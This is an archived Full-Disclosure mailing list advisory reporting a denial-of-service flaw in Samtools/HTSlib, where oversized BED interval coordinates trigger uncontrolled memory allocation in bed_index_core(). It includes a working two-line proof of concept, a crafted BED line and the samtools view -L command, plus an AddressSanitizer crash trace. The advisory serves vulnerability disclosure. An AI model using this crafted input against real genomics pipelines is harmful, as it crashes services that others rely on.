| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFmK-GxzemFKLUGytEfQqUzts43yMkj_d2KO8D+hguqEW5puAg@mail.gmail.com>
Date: Sun, 28 Sep 2025 12:17:19 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED
Intervals Causes Denial-of-Service in Samtools/HTSlib
A denial-of-service vulnerability exists in Samtools and the underlying
HTSlib when processing BED files containing extremely large interval
values. The bed_index_core() function in bedidx.c uses the interval end
coordinate to calculate allocation size without sufficient validation. By
supplying a BED record with a crafted end coordinate (e.g., near 2^61), an
attacker can trigger uncontrolled memory allocation requests via
hts_resize_array_(). This leads to process termination due to failed
allocations, effectively causing a denial of service. This issue can be
exploited by tricking a user or automated pipeline into loading a malicious
BED file with oversized intervals (e.g., via the -L option of samtools
view).
*Impact*
- Denial-of-Service (DoS)
*Proof of Concept:*
Craft BED with an oversized interval
echo -e "chr1\t0\t2305843009213693940" > bad.bed
# Trigger DoS with samtools
samtools view -L bad.bed big.bam
*Output:*
=================================================================
==1060879==ERROR: AddressSanitizer: requested allocation size
0x10000000000000 (0x10000000001000 after adjustments for alignment, red
zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
#0 0xaad05674fd5c in realloc (/root/samtools/samtools+0xdfd5c)
(BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660)
#1 0xaad0568afc64 in hts_resize_array_ /root/htslib/hts.c:5070:15
#2 0xaad056873d80 in bed_index_core /root/samtools/bedidx.c:120:13
#3 0xaad056873d80 in bed_index /root/samtools/bedidx.c:149:17
#4 0xaad056872780 in bed_read /root/samtools/bedidx.c:348:9
#5 0xaad0567958b4 in main_samview /root/samtools/sam_view.c:1066:33
#6 0xaad0567d5b40 in main /root/samtools/bamtk.c:246:55
#7 0xfffaacef2290 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#8 0xfffaacef2374 in __libc_start_main csu/../csu/libc-start.c:360:3
#9 0xaad0566acc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId:
031fb204568f835410c0dd07ee99a915c9a7b660)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists